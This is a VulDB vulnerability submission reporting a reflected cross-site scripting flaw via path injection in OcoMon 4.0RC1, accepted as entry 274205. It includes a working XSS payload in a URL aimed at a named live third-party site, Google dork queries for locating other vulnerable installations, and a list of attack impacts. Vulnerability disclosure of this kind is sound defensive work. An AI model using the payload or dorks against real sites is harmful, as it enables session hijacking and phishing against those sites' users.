| 제목 | OcoMon Software 4.0 Cross Site Scripting |
|---|
| 설명 | Hi VulDB Team! I found a Reflected XSS via Path Injection in OcoMon 4.0RC1 - 20211023
I checked for CVE assigned for this but I not found and I contacted vendor but no response.
This website for example using the software and it's vulnerable, see the XSS Pop-up:
https://sac.edtbrasil.com/includes/common/require_access_recovery.php/xx'%22%3E%3Cimg%20src=q%20onerror=prompt(document.domain)%3E
I injected the payload: xx'"><img src=q onerror=prompt(document.domain)> in final URL after "/"
Google Dorks for finding more websites:
intitle:"OcoMon 4.0RC1 - 20211023"
intitle:"OcoMon 4.0RC1"
Impact:
View any information that the user is able to view.
Modify any information that the user is able to modify.
Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
Others:
1- Ad-Jacking 2- Session Hijacking 3- Bypassing CSRF protection 4- Phishing
5- Send malware to users 6- Redirect to malicious website
Cheers,
Everton Hydd3n |
|---|
| 원천 | ⚠️ https://sac.edtbrasil.com/includes/common/require_access_recovery.php/xx039;%22%3E%3Cimg%20src=q%20onerror=prompt(document.domain)%3E |
|---|
| 사용자 | Hydd3n (UID 73317) |
|---|
| 제출 | 2024. 08. 10. PM 12:15 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 08. 12. PM 08:46 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 274205 [OcoMon 4.0/4.0RC1/5.0RC1 URL require_access_recovery.php 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|